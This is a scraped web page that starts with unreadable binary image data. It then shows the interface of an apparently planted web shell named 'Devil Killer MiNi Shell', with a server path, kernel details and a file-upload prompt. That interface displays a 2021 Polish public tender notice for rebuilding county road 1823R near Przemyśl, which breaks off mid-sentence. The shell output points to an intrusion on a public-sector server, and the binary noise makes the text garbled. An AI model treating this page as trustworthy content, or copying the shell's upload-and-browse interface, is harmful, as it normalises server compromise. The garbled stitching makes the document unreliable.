JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210809/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210809/0014118901-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00141189 z dnia 2021-08-09</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi powiatowej nr 1823R Stubno-Kalników-Korczowa </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Przemyślu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650945384</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Dominikański, 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Przemyśl</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zdpprzemysl@op.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdpp.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi powiatowej nr 1823R Stubno-Kalników-Korczowa </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b90f321a-f8d7-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00141189</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000533/11/P</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zp.powiat.przemysl.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zp.powiat.przemysl.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, tj.<br/>bezpłatnierejestrując się lub logując, w przypadku posiadania konta w Platformie Zamówień<br/>Publicznych,akceptuje warunki korzystania z Platformy, określone w Regulaminie zamieszczonym na<br/>stronieinternetowej https://zp.powiat.przemysl.pl/oraz uznaje go za wiążący.3. Ogólne zasady<br/>korzystania zPlatformy:1) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu<br/>nasubdomenie https://zp.powiat.przemysl.pl/2) Wykonawca aby przystąpić do postępowania<br/>musizałożyć konto na Platformie https://zp.powiat.przemysl.pl/ gdzie zostanie powiadomiony o<br/>możliwościzalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesurejestracyjnego; podaje adres e-mail, otrzymuje link aktywacyjny, a następnie ustanawia<br/>hasło.3)Proces rejestracji Wykonawcy jest w pełni automatyczny, po zarejestrowaniu należy podać<br/>dane firmy,którą osoba zakładająca konto reprezentuje.4) Po założeniu konta Wykonawca ma<br/>możliwość złożeniaOferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w<br/>szczególnościzawiadomienia oraz informacje, przekazywane są w formie elektronicznej za<br/>pośrednictwem Platformyi powiadomień mailowych.5) Zamawiający, zgodnie z § 3<br/>ROZPORZĄDZENIE PREZESA RADYMINISTRÓWz dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacjioraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznejw postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (dalej jako "Rozporządzenie")określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na Platformie Zakupowej,tj.: a) stały dostęp do sieci Internet o gwarantowanej<br/>przepustowości nie mniejszej niż 512 kb/s,b)komputer klasy PC lub MAC, o następującej konfiguracji:<br/>pamięć min 2GB Ram, procesor Intel IV2GHZ, jeden z systemów operacyjnych - MS Windows 10, Mac<br/>Os x 10.4, Linux, lub ich nowszewersje,c) zainstalowana dowolna przeglądarka internetowa najlepiej<br/>najnowszej dostępnej wersjiobsługująca TLS 1.2 z wyjątkiem Internet Explorer,d) włączona obsługa<br/>JavaScript,e) zainstalowanyprogram Acrobat Reader lub inny obsługujący pliki w formacie .pdf,f)<br/>podłączony lub wbudowany dokomputera czytnik karty kryptograficznej wydanej przez wystawcę<br/>certyfikatu używanego przezWykonawcę.6) Zamawiający, zgodnie z § 3 powołanego powyżej<br/>Rozporządzenia określa:a)dopuszczalne formaty przesyłanych danych, tj. plików o wielkości do 100<br/>MB w formatach: .doc, .pdf,.zip.b) informacje na temat kodowania i czasu odbioru danych: - plik<br/>załączony przez Wykonawcę naPlatformie Zamówień Publicznych i zapisany, widoczny jest w Systemie, jako zaszyfrowany – formatkodowania UTF8. Możliwość otworzenia pliku dostępna jest<br/>dopiero po odszyfrowaniu przezZamawiającego po upływie terminu składania ofert.c) oznaczenie<br/>czasu odbioru danych przezPlatformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg<br/>czasu platformy, który jestsynchronizowany ze znacznikiem czasu UTC.4. Wykonawca powinien<br/>dokładnie zapoznać się zniniejszą SWZ i złożyć ofertę zgodnie z określonymi wymaganiami.5.<br/>Wszelkie oświadczenia, wnioski,zawiadomienia oraz informacje przekazywane będą elektronicznie za<br/>pośrednictwem dedykowanegoformularza udostępnionego na Platformie: zp.powiat.przemysl.pl6.<br/>Dokumenty, podmiotowe środkidowodowe oraz inne dokumenty lub oświadczenia muszą być złożone<br/>w formie elektronicznej lub wpostaci elektronicznej opatrzone podpisem zaufanym lub podpisem<br/>osobistym osoby upoważnionej doreprezentowania wykonawców zgodnie z formą reprezentacji<br/>określoną w dokumencie rejestrowymwłaściwym dla formy organizacyjnej lub innym dokumencie oraz<br/>składane są przez Wykonawcę zapośrednictwem Formularza do komunikacji jako załączniki.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia<br/>4 maja 2016r., str. 1; zwanym dalej „RODO”) informujemy, że:2. administratorem Pani/Pana danych<br/>osobowych jestDyrektor Zarządu Dróg Powiatowych w Przemyślu Plac Dominikański 3 , 37-700<br/>Przemyśl3.administrator wyznaczył Inspektora Danych Osobowych : P. mgr Elżbieta Kalita z którym<br/>można siękontaktować pod adresem e-mail: zdpprzemysl@op.pl, .tel. 16 675-00-254. Dane osobowe<br/>wykonawcybędą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>przedmiotowympostępowaniem o udzielenie zamówienia publicznego. 5. Odbiorcami przekazanych<br/>przez wykonawcędanych osobowych będą osoby lub podmioty, którym zostanie udostępniona<br/>dokumentacjapostępowania zgodnie z art.74 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r. o<br/>dostępie doinformacji publicznej.6. Dane osobowe wykonawcy zawarte w protokole postępowania<br/>będąprzechowywane przez okres 4 lat, od dnia zakończenia postępowania o udzielenie zamówienia, a<br/>jeżeliczas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania<br/>umowy.7.Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jestwymogiem ustawowym określonym w przepisanych ustawy P.Z.P., związanym z<br/>udziałem wpostępowaniu o udzielenie zamówienia publicznego.8. W odniesieniu do Pani/Pana danych<br/>osobowychdecyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.9.<br/>PosiadaPani/Pan:a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana<br/>dotyczących(w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora<br/>niewspółmierniedużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych<br/>informacji mającychna celu sprecyzowanie żądania, w szczególności podania nazwy lub daty<br/>postępowania o udzieleniezamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty<br/>zakończonegopostępowania o udzielenie zamówienia);b) na podstawie art. 16 RODO prawo do<br/>sprostowaniaPani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może<br/>skutkować zmianąwyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień<br/>umowy wzakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz<br/>jegozałączników);c) na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczeniaprzetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o<br/>udzieleniezamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2<br/>RODO (prawodo ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania,<br/>w celuzapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznejlub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub<br/>państwaczłonkowskiego);d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdyuzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy RODO;10. Nie przysługuje Pani/Panu:a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo<br/>do usunięciadanych osobowych;b) prawo do przenoszenia danych osobowych, o którym mowa w art.<br/>20 RODO;c)na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyżpodstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>11.Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z<br/>RODOprzetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym<br/>dlaprzedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP.IV.333-18/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi powiatowej nr 1823R Stubno-Kalników-Korczowa </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się<br/>następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał<br/>spełnienie kryteriów:<br/>Lp. Opis kryterium oceny Znaczenie (%)<br/>1. Cena (koszt) 60%<br/>2. Termin gwarancji i rękojmi 40%<br/>Razem 100%<br/>Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100-punktowej.<br/>CENA – 60%<br/>Cena będzie oceniana metodą punktową wg wzoru:<br/>Cena najniższa ze wszystkich ofert x 100pkt x Znaczenie kryterium 60%<br/>Cena oferty badanej<br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny.<br/>TERMIN GWARANCJI I RĘKOJMI – 40%<br/>Oferta w kryterium termin gwarancji i rękojmi może uzyskać od 0 do 40 pkt, przy czym oferta z<br/>najdłuższym okresem gwarancji otrzyma max 40 pkt. Pozostałym wykonawcom zostaną przyznane<br/>punkty wg następującego wzoru:<br/>Wartość punktowa = Rk Tn / Tmax<br/>Rk - waga kryterium<br/>Tn - termin gwarancji oferowany w aktualnie ocenianej ofercie<br/>Tmax -największa liczba punktów osiągnięta przez którąkolwiek z ofert w ramach kryterium nr 2<br/>Zamawiający przyzna punkty za termin gwarancji nie krótszy niż 24 miesięcy i nie dłuższy niż 36<br/>miesięcy. W przypadku zaoferowania terminu krótszego niż 24 miesiące Zamawiający przyzna 0<br/>punktów bez poddawania porównywaniu z innymi ofertami.<br/>W przypadku zaoferowania terminu dłuższego niż 36 miesięcy Zamawiający do porównania przyjmie<br/>termin 36 miesięcy, natomiast Wykonawca będzie związany terminem zaoferowanym w ofercie.<br/>Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium termin gwarancji i rękojmi<br/>Łączna liczba punktów za ofertę = liczba punktów za cenę brutto (maks. 60) + liczba punktów za termin<br/>gwarancji i rękojmi (maks. 40)<br/>1. Opis sposobu obliczenia łącznej oceny ofert:<br/>1) Łączna ocena punktowa (P) oferty zostanie obliczona według formuły<br/>P = PC + TGR<br/>Gdzie:<br/>PC – ilość punktów przyznanych Wykonawcy w kryterium cena brutto zamówienia,<br/>TGR – ilość punktów przyznanych Wykonawcy w kryterium termin gwarancji i rękojmi.<br/>Łączna ilość punktów oferty stanowi sumę ilości punktów przyznanych w kryterium „CENA” oraz ilości<br/>punktów przyznanych w kryterium „TERMIN GWARANCJI I RĘKOJMI”. Oferta, która otrzyma<br/>największą łączną ilość punktów zostanie uznana za najkorzystniejszą. Pozostałe oferty zostaną<br/>sklasyfikowane zgodnie z uzyskaną łączną ilością punktów.<br/>2. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia<br/>taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę,<br/>która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>3. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera<br/>ofertę z najniższą ceną.<br/>2. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w pkt 2, zamawiający wzywa<br/>wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert<br/>dodatkowych zawierających nową cenę.<br/>5. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z<br/>dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>6. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści<br/>złożonej oferty lub innych składanych dokumentów lub oświadczeń w tym zaoferowanej ceny.<br/>7.Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu<br/>nazasadach określonych w pkt. 8 II Rozdziału oraz spełniają na podstawie art. 112 określone<br/>przezZamawiającego warunki udziału w postępowaniu dotyczące:1) zdolności do występowania<br/>wobrocie gospodarczym:Zamawiający nie precyzuje w tym zakresie żadnych wymagań,<br/>którychspełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.2) uprawnień<br/>doprowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z<br/>odrębnychprzepisów:Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których<br/>spełnienieWykonawca zobowiązany jest wykazać w sposób szczególny.3) sytuacji ekonomicznej<br/>lubfinansowej:Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których<br/>spełnienieWykonawca zobowiązany jest wykazać w sposób szczególny.4) zdolności technicznej<br/>lubzawodowej:Zamawiający uzna, że wykonawca spełnia warunek w zakresie<br/>kwalifikacjizawodowych, jeżeli: Wykonawca wykaże:- że będzie dysponował w trakcie<br/>realizacjizamówienia min. 1 osobą - kierownikiem branży drogowej (posiadającym uprawnienia<br/>dokierowania robotami w specjalności drogowej) lub równoważne uprawnienia, wydane<br/>napodstawie wcześniej obowiązujących przepisów, które pozwalać będą na pełnienie<br/>funkcjiKierownika budowy w zakresie niniejszego zamówieniaUWAGA:Zamawiający,<br/>określającwymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych,<br/>dopuszczaodpowiadające im uprawnienia budowlane nadane obywatelom państw<br/>członkowskich wrozumieniu art 4a ustawy z dnia 15 grudnia 2000 r. o samorządach<br/>zawodowych architektóworaz inżynierów budownictwa (Dz. U z 2016 r., poz. 1725 t.j.). uznane<br/>na podstawie odrębnychprzepisów, stosowanie do treści art. 12 a ustawy Prawo Budowlane<br/>.Ilekroć w opisie warunkówudziału w postępowaniu mowa jest o uprawnieniach, to w przypadku<br/>osób będącychobywatelami państw członkowskich oznacza to decyzję w sprawie uznania<br/>wymaganychkwalifikacji do wykonywania w Rzeczpospolitej Polskiej samodzielnych funkcji<br/>technicznych wbudownictwie w zakresie przedmiotu niniejszego zamówienia – zgodnie z<br/>właściwymiprzepisami, w szczególności z Ustawą o zasadach uznawania kwalifikacji<br/>zawodowych nabytychw państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r. poz. 65 z<br/>późn. zm.) orazUstawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz<br/>inżynierówbudownictwa (Dz. U z 2016 r., poz. 1725 t.j.).Wszystkie w/w osoby kadry technicznej<br/>musząposługiwać się językiem polskim lub w przypadku braku znajomości języka polskiego<br/>przez w/wosoby, Wykonawca zobowiązany jest na własny koszt do zapewnienia tłumacza<br/>językapolskiego w celu stałego bieżącego i symultanicznego tłumaczenia w kontaktach<br/>pomiędzyZamawiającym a personelem Wykonawcy. Podmiot, który zobowiązał się do<br/>udostępnieniazasobów, odpowiada solidarnie z wykonawcą, który polega na jego sytuacji<br/>finansowej lubekonomicznej, za szkodę poniesioną przez zamawiającego powstałą wskutek<br/>nieudostępnieniatych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi<br/>winy. Odnośnie do wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą oni<br/>polegać nazdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do<br/>realizacjiktórych te zdolności są wymagane. W przypadku posługiwania się przez wykonawcę<br/>cudzympotencjałem, wykonawcy mogą polegać na zdolnościach podmiotów udostępniających<br/>zasoby,jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te 